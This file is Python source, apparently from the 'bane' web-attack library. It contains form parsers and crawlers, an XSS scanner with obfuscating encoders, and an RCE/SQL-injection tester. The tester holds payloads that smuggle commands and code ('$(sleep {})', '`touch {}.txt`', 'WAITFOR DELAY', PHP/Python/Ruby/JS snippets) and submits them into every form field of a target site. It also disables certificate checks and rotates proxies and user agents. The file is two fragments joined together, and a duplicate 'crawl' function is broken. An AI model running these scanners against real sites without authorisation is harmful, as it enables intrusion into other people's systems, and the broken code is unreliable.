 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if bypass==True:
  u+='#'
 if cookie:
  hea={'User-Agent': us,'Cookie':cookie}
 else:
  hea={'User-Agent': us}
 l=[]
 try:
  c=requests.get(u, headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  soup= BeautifulSoup(c,'html.parser')
  p=soup.find_all('textarea')
  for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.get("value")
     if v==None:
      v=''
    if value==True:
     y=s+":"+v
    else:
     y=s
    if y not in l:
     l.append(y)
  p=soup.find_all('input')
  for r in p: 
    v=""
    if r.has_attr('name'):
     s=str(r)
     s=s.split('name="')[1].split(',')[0]
     s=s.split('"')[0].split(',')[0]
     if (r.has_attr('value') and (value==True)):
      v=str(r)
      v=v.split('value="')[1].split(',')[0]
      v=v.split('"')[0].split(',')[0]
    if value==True:
     y=s+":"+v
    else:
     y=s
    if y not in l:
     l.append(y)
 except Exception as e:
  pass
 return l

def forms(u,value=True,html_comments=False,user_agent=None,timeout=10,bypass=False,proxy=None,cookie=None):
 '''
   same as "inputs" function but it works on forms input fields only
 '''
 if urlparse(u).path=='':
  u+="/"
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if proxy:
   proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if bypass==True:
   u+='#'
 if cookie:
   hea={'User-Agent': us,'Cookie':cookie}
 else:
   hea={'User-Agent': us}
 l=[]
 fom=[]
 try:
  c=requests.get(u, headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  soup= BeautifulSoup(c,'html.parser')
  i=soup.find_all('form')
  for f in i:
   ac=f.get('action')
   if not ac:
    ac=u
   """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
   if ("://" not in ac):
      ur=u[:u.rfind('/')]
      if ac[0]=="/":
       ac=ac[1:len(ac)]
      ac=ur+"/"+ac
   me=f.get('method')
   if not me :
    me="get"
   if len(me)==0:
    me="get"
   me=me.lower()
   p=f.find_all('textarea')
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.get("value")
     if v==None:
      v=''
    if value==True:
     y=s+":"+v
    else:
     y=s
    if y not in l:
     l.append(y)
   p=f.find_all('input')
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.get("value")
     if v==None:
      v=''
    if value==True:
     y=s+":"+v
    else:
     y=s
    if y not in l:
     l.append(y)
   fom.append({'inputs':l,'action':ac,'method':me}) 
   l=[]
 except Exception as e:
  pass
 return fom

def sort_inputs(l):
 a=[]
 d=[]
 for x in l:
  if x["type"] not in [u"radio",u"checkbox"]:
   d.append(x)
  if x["name"] not in a and (x["type"]==u"radio" or x["type"]==u"checkbox")  :
   a.append(x["name"])
 for x in a:
  d.append({'type': [ i["type"] for i in l if i["name"]==x][0], 'name':x,"value":[ i["value"] for i in l if i["name"]==x]})
 return d

def forms_parser(u,html_comments=False,user_agent=None,timeout=10,bypass=False,proxy=None,cookie=None):
 '''
   same as "forms" function but it return detailed information about all forms in a given page
 '''
 if urlparse(u).path=='':
  u+="/"
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if proxy:
   proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if bypass==True:
   u+='#'
 if cookie:
   hea={'User-Agent': us,'Cookie':cookie}
 else:
   hea={'User-Agent': us}
 l=[]
 fom=[]
 try:
  c=requests.get(u, headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  soup= BeautifulSoup(c,'html.parser')
  i=soup.find_all('form')
  for f in i:
   try:
    tb_inputs=f.find_all('table')[0].find_all('input')
   except:
    tb_inputs=[]
   try:
    tb_textareas=f.find_all('table')[0].find_all('textarea')
   except:
    tb_textareas=[]
   try:
    tb_selects=f.find_all('table')[0].find_all('select')
   except:
    tb_selects=[]
   ac=f.get('action')
   enc_ty=f.get('enctype','application/x-www-form-urlencoded')
   if not ac:
    ac=u
   """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
   if ("://" not in ac):
      ur=u[:u.rfind('/')]
      if ac[0]=="/":
       ac=ac[1:len(ac)]
      ac=ur+"/"+ac
   me=f.get('method')
   if not me :
    me="get"
   if len(me)==0:
    me="get"
   me=me.lower()
   p=f.find_all('textarea')+tb_textareas
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.renderContents().decode().split('</textarea>')[0]
     typ=r.get("type","textarea")
     y={"name":s,"value":v,"type":typ}
     if y not in l:
      l.append(y)
   h_v={}
   p=f.find_all('input')+tb_inputs
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.get("value",'')
     typ=r.get("type","text")
     y={"name":s,"value":v,"type":typ}
     if typ.lower()=="hidden":
      h_v.update({s:v})
     if y not in l:
      l.append(y)
   p=f.find_all('select')+tb_selects
   opts=[]
   for r in p:
    if r.has_attr('name'):
     s=r.get("name")
     for x in r.find_all('option'): 
      opts.append(x.text)
     y={"name":s,"value":opts,"type":"select"}
     if y not in l:
      l.append(y)
   fom.append({'inputs':sort_inputs(l),'action':ac,'enctype':enc_ty,'method':me,"hidden_values":h_v}) 
   l=[]
 except Exception as e:
  pass
 return fom

def forms_parser_text(u,text,html_comments=False):
 '''
   same as "forms" function but it return detailed information about all forms in a given page
 '''
 if urlparse(u).path=='':
  u+="/"
 l=[]
 fom=[]
 try:
  c=text
  if html_comments==False:
   c=remove_html_comments(c)
  soup= BeautifulSoup(c,'html.parser')
  i=soup.find_all('form')
  for f in i:
   try:
    tb_inputs=f.find_all('table')[0].find_all('input')
   except:
    tb_inputs=[]
   try:
    tb_textareas=f.find_all('table')[0].find_all('textarea')
   except:
    tb_textareas=[]
   try:
    tb_selects=f.find_all('table')[0].find_all('select')
   except:
    tb_selects=[]
   ac=f.get('action')
   enc_ty=f.get('enctype','application/x-www-form-urlencoded')
   if not ac:
    ac=u
   """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
   if ("://" not in ac):
      ur=u[:u.rfind('/')]
      if ac[0]=="/":
       ac=ac[1:len(ac)]
      ac=ur+"/"+ac
   me=f.get('method')
   if not me :
    me="get"
   if len(me)==0:
    me="get"
   me=me.lower()
   p=f.find_all('textarea')+tb_textareas
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.renderContents().decode().split('</textarea>')[0]
     typ=r.get("type","textarea")
     y={"name":s,"value":v,"type":typ}
     if y not in l:
      l.append(y)
   h_v={}
   p=f.find_all('input')+tb_inputs
   for r in p: 
    if r.has_attr('name'):
     s=r.get("name")
     v=r.get("value",'')
     typ=r.get("type","text")
     y={"name":s,"value":v,"type":typ}
     if typ.lower()=="hidden":
      h_v.update({s:v})
     if y not in l:
      l.append(y)
   p=f.find_all('select')+tb_selects
   opts=[]
   for r in p:
    if r.has_attr('name'):
     s=r.get("name")
     for x in r.find_all('option'): 
      opts.append(x.text)
     y={"name":s,"value":opts,"type":"select"}
     if y not in l:
      l.append(y)
   fom.append({'inputs':sort_inputs(l),'action':ac,'enctype':enc_ty,'method':me,"hidden_values":h_v}) 
   l=[]
 except Exception as e:
  pass
 return fom


def cookies_to_dict(cookies):
  d={}
  a=cookies.split(";")
  for x in a:
   if "=" in x:
    d.update({x.split("=")[0].strip():x.split("=")[1].strip()})
  return d

def update_cookies(cookies,cook):
 c1={}
 c2={}
 if cookies:
  c1=cookies_to_dict(cookies)
 if cook:
  c2=cookies_to_dict(cook)
 c2.update(c1)
 cookie=""
 for x in c2:
  cookie+=x+"="+c2[x]+";"
 return cookie

def set_correct_cookies(new_cookies,cookie=None):
 if not cookie:
  cookie=""
 if not new_cookies:
  new_cookies=""
 if cookie and len(cookie)>0:
   if new_cookies and len(new_cookies)>0:
    cookies=update_cookies(new_cookies,cookie)
   else:
    cookies=cookie
 else:
    cookies=new_cookies
 return cookies


def set_up_injection(url,form_index,parameter,payload,cookie,user_agent,proxy,timeout,auto_fill,file_extension='png',leave_empty=[],dont_send=[],mime_type=None):
  cookies=None
  if proxy:
   proxy={'http':'http://'+proxy,'https':'http://'+proxy}
  h={"User-Agent":user_agent}
  if cookie:
   h.update({"Cookie":cookie})
   cookies=cookie
  try:
   r=requests.get(url,proxies=proxy,headers=h, verify=False, timeout=timeout)
  except:
   return False
  cook=None
  try:
   cook=r.headers['Set-cookie']
  except:
   pass
  cookies=set_correct_cookies(cook,cookie=cookie)
  form=forms_parser_text(url, r.text)[form_index]
  h={"User-Agent":user_agent}
  if cookies and len(cookies.strip())>0:
   h.update({"Cookie":cookies})
  return form_filler(form,parameter,payload,auto_fill=auto_fill,file_extension=file_extension,leave_empty=leave_empty,dont_send=dont_send,mime_type=mime_type),h,proxy,timeout


def form_filler(form,param,payload,file_extension='png',auto_fill=10,leave_empty=[],dont_send=[],mime_type=None):
 for x in form["inputs"]:
  if x["name"].strip() in dont_send:
   form["inputs"].remove(x)
  else:
   if x["name"].strip() not in leave_empty:
    if x["name"].strip()==param:
     if x["type"]=="file":
      if not mime_type:
       x["value"]=(payload+"."+file_extension,files_upload[file_extension])
      else:
       x["value"]=(payload+"."+file_extension,files_upload[file_extension],mime_type)
     else:
      x["value"]=payload
    else:
     if x["value"]=="":
      if x["type"]=="file":
       if not mime_type:
        x["value"]=("bane_test"+str(random.randint(100000,999999))+"."+file_extension,files_upload[file_extension])
       else:
        x["value"]=("bane_test"+str(random.randint(100000,999999))+"."+file_extension,files_upload[file_extension],mime_type)
      else:
       for i in range(auto_fill):
        if x["type"]=="number":
         x["value"]+=str(random.randint(1,9))
        else:
         x["value"]+=random.choice(lis)
     if x["type"] in ["select","radio","checkbox"]:
      if len(x["value"])==0 or x["value"]=="":
       x["value"]=""
       for i in range(auto_fill):
        x["value"]+=random.choice(lis)
      else:
       x["value"]=random.choice(x["value"])
 return form

def get_login_form(url,text):
 a=forms_parser_text(url,text)
 for x in a:
  for i in x["inputs"]:
   if i["type"].lower().strip()=="password":
    return x
 raise Exception('No login form')


def set_login_form(url,text,username,password):
 a=get_login_form(url,text)
 d={}
 for x in a["inputs"]:
  if x["type"].lower().strip()=="password":
   d.update({x["name"]:password})
  elif x["type"].lower().strip()=="text" or x["type"].lower().strip()=="email" or x["type"].lower().strip()=="tel":
   d.update({x["name"]:username})
  else:
   d.update({x["name"]:x["value"]})
 return [d,a["action"]]

def get_upload_form(a):
 for x in a:
  for i in x["inputs"]:
   if i["type"].lower().strip()=="file":
    return x
 raise Exception('No file upload form')

def get_upload_form_text(url,text):
 a=forms_parser_text(url,text)
 for x in a:
  for i in x["inputs"]:
   if i["type"].lower().strip()=="file":
    return x
 raise Exception('No file upload form')


def crawl(u,timeout=10,html_comments=False,user_agent=None,bypass=False,proxy=None,cookie=None):
 '''
   this function is used to crawl any given link and returns a list of all available links on that webpage with ability to bypass anti-crawlers
   
   the function takes those arguments:
   
   u: the targeted link
   timeout: (set by default to 10) timeout flag for the request
   bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

   usage:

   >>>import bane
   >>>url='http://www.example.com'
   >>>bane.crawl(url)
   
   >>>bane.crawl(url,bypass=True)
'''
 if urlparse(u).path=='':
  u+="/"
 if u.split("?")[0][-1]!="/" and '.' not in u.split("?")[0].rsplit('/', 1)[-1]:
    u=u.replace('?','/?')
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 h={}
 if bypass==True:
  u+='#'
 if cookie:
  hea={'User-Agent': us,'Cookie':cookie}
 else:
  hea={'User-Agent': us}
 try:
  c=requests.get(u, headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  soup = BeautifulSoup(c,"html.parser")
  ur=u.replace(u.split("/")[-1],'')
  """if ur[-1]=='/':
   ur=ur[:-1]"""
  index_link=0
  h.update({-1:("Source_url",u,urlparse(u).path,[ (x,furl.furl(u).args[x]) for x in furl.furl(u).args])})
  for a in soup.find_all('a'):
   u=ur
   if a.has_attr('href'):
    try:
     txt=a.text
     a=str(a['href'])
     if ("://" not in a):
      if a[0]=="/":
       a=a[1:len(a)]
      a=u+a
     if (a not in h.values()) and (u in a):
      if (a!=u+"/") and (a!=u):
       h.update({index_link:(txt,a,urlparse(a).path,[ (x,furl.furl(a).args[x]) for x in furl.furl(a).args])})
       index_link+=1
    except Exception as e:
     pass
 except Exception as ex:
  pass
 return h

def crawl(u,text,html_comments=False):
 '''
   this function is used to crawl any given link and returns a list of all available links on that webpage with ability to bypass anti-crawlers
   
   the function takes those arguments:
   
   u: the targeted link
   timeout: (set by default to 10) timeout flag for the request
   bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

   usage:

   >>>import bane
   >>>url='http://www.example.com'
   >>>bane.crawl(url)
   
   >>>bane.crawl(url,bypass=True)
'''
 if urlparse(u).path=='':
  u+="/"
 if u.split("?")[0][-1]!="/" and '.' not in u.split("?")[0].rsplit('/', 1)[-1]:
    u=u.replace('?','/?')
 try:
  c=text
  if html_comments==False:
   c=remove_html_comments(c)
  soup = BeautifulSoup(c,"html.parser")
  ur=u.replace(u.split("/")[-1],'')
  """if ur[-1]=='/':
   ur=ur[:-1]"""
  index_link=0
  h.update({-1:("Source_url",u,urlparse(u).path,[ (x,furl.furl(u).args[x]) for x in furl.furl(u).args])})
  for a in soup.find_all('a'):
   u=ur
   if a.has_attr('href'):
    try:
     txt=a.text
     a=str(a['href'])
     if ("://" not in a):
      if a[0]=="/":
       a=a[1:len(a)]
      a=u+a
     if (a not in h.values()) and (u in a):
      if (a!=u+"/") and (a!=u):
       h.update({index_link:(txt,a,urlparse(a).path,[ (x,furl.furl(a).args[x]) for x in furl.furl(a).args])})
       index_link+=1
    except Exception as e:
     pass
 except Exception as ex:
  pass
 return h


def media(u,timeout=10,html_comments=False,user_agent=None,bypass=False,proxy=None,cookie=None):
 '''
   this funtion was made to collect the social media links related to the targeted link (facebook, twitter, instagram...).

   the function takes those arguments:
   
   u: the targeted link
   timeout: (set by default to 10) timeout flag for the request
   bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

   usage:

   >>>import bane
   >>>url='http://www.example.com'
   >>>bane.media(url)
   
   >>>bane.media(url,bypass=True)
'''
 if urlparse(u).path=='':
  u+="/"
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 if cookie:
   hea={'User-Agent': us,'Cookie':cookie}
 else:
   hea={'User-Agent': us}
 h={}
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 try:
  if bypass==True:
   u+='#'
  if cookie:
   hea={'User-Agent': us,'Cookie':cookie}
  else:
   hea={'User-Agent': us}
  c=requests.get(u,headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  soup = BeautifulSoup(c,"html.parser")
  ul=u.split('://')[1].split('"')[0]
  ur=ul.replace("www.",'') 
  for a in soup.findAll('a'):
   try:
    if a.has_attr('href') and (u not in a['href']) and (ur not in a['href']) and (a['href'][:4]=="http") :
     txt=a.text
     if a["href"] not in h:
      h.update({txt:a["href"]})
   except:
    pass
 except:
  pass
 return h

def subdomains_extract(u,timeout=10,html_comments=False,user_agent=None,bypass=False,proxy=None,cookie=None):
 '''
   this function collects the subdomains found on the targeted webpage.

   the function takes those arguments:
   
   u: the targeted link
   timeout: (set by default to 10) timeout flag for the request
   bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)

   usage:

   >>>import bane
   >>>url='http://www.example.com'
   >>>bane.subdomains_extract(url)
   
   >>>bane.subdomains_extract(url,bypass=True)
'''
 if urlparse(u).path=='':
  u+="/"
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 h={}
 if cookie:
  hea={'User-Agent': us,'Cookie':cookie}
 else:
  hea={'User-Agent': us}
 try:
  if bypass==True:
   u+='#'
  c=requests.get(u, headers = hea,proxies=proxy,timeout=timeout, verify=False).text
  if html_comments==False:
   c=remove_html_comments(c)
  ul=u.split('://')[1].split('/')[0]
  soup = BeautifulSoup(c,"html.parser")
  for a in soup.findAll('a'):
   if a.has_attr('href') and (ul.replace("www",'') in a['href']) and (ul not in a['href']) and (a['href'][:4]=="http"):
    txt=a.text
    try:
     hr=a['href'].split("://")[1].split("/")[0]
     h.update({txt:hr})
    except Exception as e:
     pass
 except Exception as e:
  pass
 return h


#coding: utf-8
import subprocess,os,xtelnet,sys,cgi,re,json
from colorama import Fore, Back, Style
if  sys.version_info < (3,0):
 if (sys.platform.lower() == "win32") or( sys.platform.lower() == "win64"):
  Fore.WHITE=''
  Fore.GREEN=''
  Fore.RED=''
  Fore.YELLOW=''
  Fore.BLUE=''
  Fore.MAGENTA=''
  Style.RESET_ALL=''
 import urllib,HTMLParser
 from urlparse import urlparse
else:
 from urllib.parse import urlparse
 import urllib.parse as urllib
 import html.parser as HTMLParser
 unicode=str
import requests,socket,random,time,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
from bane.pager import *
from bane.js_fuck import js_fuck
from bane.extrafun import write_file,delete_file

def random_string(size):
 s=""
 for x in range(size):
     s+=random.choice(lis)
 return s
 
#why did i remove the SQL-Is part? well compared to other scanning functions they are immature. Besides SQLMap is a better option to test against SQL-Is :)


def jsfuck_encoder(text,parent=True,eval=True):
 return js_fuck().encode(text,eval,parent)


def find_xss_context(text,payload):
 try:
  a=re.search('<(.*?)=?{}?(.*?)>'.format(re.escape(r'{}'.format(payload))), text).group(0)
  b=a.replace(payload,'')
  if len(re.findall('<(.*?)>',b))!=1:
   return payload
  else:
   return a
 except:
  return payload
  
  
def html_decoder(payload,html_encode_level=0):
 for x in range(html_encode_level):
  payload=HTMLParser.HTMLParser().unescape(payload)
 return payload

def html_encoder(text,random_level=1):
 if random_level==1:
  d=''
  for c in text:
   a=random.randint(0,1)
   if a==0:
    d+=c
   else:
    d+='&#'+str(ord(c))
  return d
 if random_level==2:
  return ''.join('&#%d' % ord(c) for c in text)
 else:
  return text

def hexadecimal_encoder(text,random_level=1):
 """
 only for js functions names
 """
 if random_level==1:
  d=''
  for c in text:
   a=random.randint(0,1)
   if a==0:
    d+=c
   else:
    d+=hex(ord(c)).replace('0x',r'\u00')
  return d
 if random_level==2:
  return ''.join(hex(ord(c)).replace('0x',r'\u00') for c in text)
 else:
  return unicode(text)

def html_hexadecimal_encoder(text,random_level=1):
 if random_level==1:
  d=''
  for c in text:
   a=random.randint(0,1)
   if a==0:
    d+=c
   else:
    d+=hex(ord(c)).replace('0x','&#x')
  return d
 if random_level==2:
  return ''.join(hex(ord(c)).replace('0x','&#x') for c in text)
 else:
  return unicode(text)


def setup_to_submit(form):
 d={}
 f={}
 for x in form["inputs"]:
  if x["type"]=="file":
   f.update({x["name"]:x["value"]})
  else:
   d.update({x["name"]:x["value"]})
 return d,f

def xss_submit(parsed,payload,replaceble_parameters,debug=False,enctype='application/x-www-form-urlencoded'):
  '''
   this function is for xss test with GET requests.

  '''
  d,fi=setup_to_submit(parsed[0])
  for x in d:
   for y in replaceble_parameters:
    if x==y:
     for z in replaceble_parameters[y]:
      d[x]=d[x].replace(z[0],z[1])
  if not fi:
   parsed[1].update({"Content-Type":enctype,"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  else:
   parsed[1].update({"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  if debug==True:
   for x in d:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,d[x]))
   for x in fi:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,fi[x]))
  if 'application/json' in enctype:
   d=json.dumps(d)
  if parsed[0]["method"]=="get":
   try:
     c=requests.get(parsed[0]["action"], params= d,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if  payload in c:
      return (True,find_xss_context(c,payload))
   except Exception as e:
    pass
  else:
   try:
     c=requests.post(parsed[0]["action"], data= d,files=fi,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if payload in c:
      return (True,find_xss_context(c,payload))
   except Exception as e:
    pass
  return (False,'')


def setup_proxy(pr,prs):
 if pr:
  return pr
 if prs:
  return random.choice(prs)
 return None
 



def setup_ua(usra):
 if usra:
  return usra
 return random.choice(ua)



def xss_forms(u,payload=None,unicode_random_level=0,js_function="alert",replaceble_parameters={"phpvalue":((".",""),)},file_extension='png',context_breaker='">',save_to_file=None,logs=True,fill_empty=10,leave_empty=[],dont_send=['btnClear'],proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None,debug=False,mime_type=None):
  '''
   this function is for xss test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.

   usage:
  
   >>>import bane
   >>>bane.xss('http://www.example.com/")

   >>>bane.xss('http://www.example.com/',payload="<script>alert(123);</script>")
   
  '''
  target_page=u
  if proxy:
   proxy=proxy
  if proxies:
   proxy=random.choice(proxies)
  dic={}
  pre_apyload=True
  if payload:
   xp_f=payload
   pre_apyload=False
  else:
   xp_f='<DeTAIlS/OpeN/OntOGglE = "{} `v`"'
  if context_breaker:
   xp_f=context_breaker+xp_f
  if logs==True:
   print(Fore.WHITE+"[~]Getting forms..."+Style.RESET_ALL)
  hu=True
  fom=forms_parser(u,proxy=proxy,timeout=timeout,cookie=cookie,user_agent=user_agent)
  if len(fom)==0:
   if logs==True:
    print(Fore.RED+"[-]No forms were found!!!"+Style.RESET_ALL)
   hu=False
  if hu==True:
   form_index=-1
   for l1 in fom:
    form_index+=1
    if pre_apyload==True:
     xp=xp_f.format(hexadecimal_encoder(js_function,random_level=unicode_random_level))
    else:
     xp=xp_f
    lst={}
    vul=[]
    sec=[]
    hu=True
    u=l1['action']
    if logs==True:
      print(Fore.BLUE+"Form: "+Fore.WHITE+str(form_index)+Fore.BLUE+"\nAction: "+Fore.WHITE+u+Fore.BLUE+"\nMethod: "+Fore.WHITE+l1['method']+Fore.BLUE+"\nPayload: "+Fore.WHITE+xp+Style.RESET_ALL)
    """if len(inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent))==0:
     hu=False
     if logs==True:
      print(Fore.YELLOW+"[-]No parameters found on that page !! Moving on.."+Style.RESET_ALL)"""
    if True:
     extr=[]
     l=[]
     for x in l1['inputs']:
      if x["name"].strip() not in leave_empty and x["name"].strip() not in dont_send:
       if x["type"] in ["hidden","file","text","textarea","email","tel","search","url","password","number","select","radio","checkbox"]:#any input type that accept direct input from keyboard
        i=x["name"]
        parsed_form=set_up_injection(target_page,form_index,i,xp,cookie,setup_ua(user_agent),setup_proxy(proxy,proxies),timeout,fill_empty,file_extension=file_extension,leave_empty=leave_empty,dont_send=dont_send,mime_type=mime_type)
        xss_res=xss_submit(parsed_form,xp,replaceble_parameters,debug=debug,enctype=l1['enctype'])
        if xss_res[0]==True:
          x="parameter: '"+i+"' => [+]Payload was found"
          vul.append((i,xss_res[1]))
          colr=Fore.GREEN
        else:
         x="parameter: '"+i+"' => [-]Payload was not found"
         sec.append(i)
         colr=Fore.RED
        if logs==True:
         print (colr+x+Style.RESET_ALL)
    dic.update({form_index:{"Form":u,"Method":l1['method'],"Passed":vul,"Failed":sec}}) 
   if save_to_file:
    with open(save_to_file.split('.')[0]+".json", 'w') as outfile:
     json.dump({"Payload":xp,"Page":target_page,"Output":dic}, outfile, indent=4)
    outfile.close()
   return {"Payload":xp,"Page":target_page,"Output":dic}


def rce_submit(parsed,payload,based_on,replaceble_parameters,debug=False,enctype='application/x-www-form-urlencoded',type_injection="code"):
  '''
   this function is for xss test with GET requests.

  '''
  d,fi=setup_to_submit(parsed[0])
  for x in d:
   for y in replaceble_parameters:
    if x==y:
     for z in replaceble_parameters[y]:
      d[x]=d[x].replace(z[0],z[1])
  if debug==True:
   for x in d:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,d[x]))
   for x in fi:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,fi[x]))
  if 'application/json' in enctype:
   d=json.dumps(d)
  t=time.time()
  if not fi:
   parsed[1].update({"Content-Type":enctype,"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  else:
   parsed[1].update({"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  if parsed[0]["method"]=="get":
   try:
     c=requests.get(parsed[0]["action"], params= d,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if based_on[0]=="file":
      c=requests.get(parsed[0]["action"].replace(parsed[0]["action"].split("/")[-1],based_on[1]+".txt"), params= d,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False)
      if ((c.status_code==200)and (len(c.text)==0)):
        return (True, parsed[0]["action"].replace(parsed[0]["action"].split("/")[-1],based_on[1])+".txt")
     if based_on[0]=="time":
      if type_injection=="command":
       if (int(time.time()-t)>=based_on[1]-2) or(c.status_code==504) :
        return (True,'')
      else:
       if (int(time.time()-t)>=based_on[1]) or(c.status_code==504) :
        return (True,'')
   except Exception as e:
    if "Read timed out" in str(e):
     if based_on[0]=="time":
      return (True,'')
  else:
   try:
     c=requests.post(parsed[0]["action"], data= d,files=fi,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if based_on[0]=="file":
      c=requests.get(parsed[0]["action"].replace(parsed[0]["action"].split("/")[-1],based_on[1]+".txt"), params= d,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False)
      if ((c.status_code==200)and (len(c.text)==0)):
        return (True, parsed[0]["action"].replace(parsed[0]["action"].split("/")[-1],based_on[1])+".txt")
     if based_on[0]=="time":
      if (int(time.time()-t)>=based_on[1]-2) or(c.status_code==504) :
        return (True,'')
      else:
       if (int(time.time()-t)>=based_on[1]) or(c.status_code==504) :
        return (True,'')
   except Exception as e:
    if "Read timed out" in str(e):
     if based_on[0]=="time":
      return (True,'')
  return (False,'')


def rce_forms(u,payload_index=0,save_to_file=None,injection={"code":"php"},code_operator_right='',code_operator_left='',command_operator_right='|',command_operator_left='&',sql_operator_right="or '",sql_operator_left="' or ",file_extension='png',replaceble_parameters={"phpvalue":((".",""),)},based_on="time",delay=10,logs=True,fill_empty=10,leave_empty=[],dont_send=['btnClear'],proxy=None,proxies=None,timeout=120,user_agent=None,cookie=None,debug=False,mime_type=None):
  '''
   this function is for RCE test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.

   usage:
  
   >>>import bane
   >>>bane.rce('http://phptester.net/")

  '''
  payloads={
            "command":
                      {
                       "linux":
                               {
                                "file":
                                       ["touch {}.txt","`touch {}.txt`","$(touch {}.txt)"],
                                "time":                            
                                       ["sleep {}","`sleep {}`","$(sleep {})"]
                                },
                       "windows":
                                {
                                 "file":
                                        ["copy nul {}.txt"],
                                 "time":
                                        ["ping -n {} 127.0.0.1"]
                                }
                       },
            "code":
                   {
                    "python":
                             {
                             "file":
                                    [" open('{}.txt', 'w') "],
                             "time":
                                    [" __import__('time').sleep({}) "]
                             },
                    "php":
                          {
                           "file":
                                  [" file_put_contents('{}.txt', '') "],
                           "time":
                                  [" sleep({}) "]
                          },
                    "ruby":
                           {
                            "file":
                                   [' File.new("{}.txt", "w") '],
                            "time":
                                   [" sleep({}) "]
                           },
                    "perl":
                           {
                            "file":
                                   [' open ( my $fh, ">", "{}.txt") '],
                            "time":
                                   [" sleep({}) "]
                           },
                    "js":
                             {
                              "file":
                                     [" require('fs').createWriteStream('{}.txt', {flags: 'w'})  "],
                              "time":
                                     [" (function wait(ms){var start = new Date().getTime();var end = start;while(end < start + ms) {end = new Date().getTime();}})({}*1000) "," await (function wait(ms){var start = new Date().getTime();var end = start;while(end < start + ms) {end = new Date().getTime();}})({}*1000) "]
                             }
                    },
            "sql":
                  {
                   "mysql":
                           {
                            "time":
                                   [" sleep({}) "]
                           },
                   "oracle":
                            {
                             "time":
                                    [" dbms_lock.sleep({}) "]
                            },
                   "postgre":
                             {
                              "time":
                                     [" pg_sleep({}) "]
                             },
                   "sql_server":
                                {
                                 "time":
                                        [" WAITFOR DELAY '00:00:{}' "]
                                }
                  }              
  }
  target_page=u
  xp=""
  based_on_o=based_on
  if list(injection.keys())[0] =="command":
   xp+=command_operator_left
   inject_type=list(injection.keys())[0]
   inject_target=injection[inject_type]
   xp+=payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][payload_index]
   if based_on_o.lower()=="file":
     based_on=("file",random_string(random.randint(3,10)))
   else:
     based_on=("time",int(delay)+2)
   xp=xp.format(based_on[1])
   xp+=command_operator_right
  elif list(injection.keys())[0] =="code":
   xp+=code_operator_left
   inject_type=list(injection.keys())[0]
   inject_target=injection[inject_type]
   xp+=payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][payload_index]
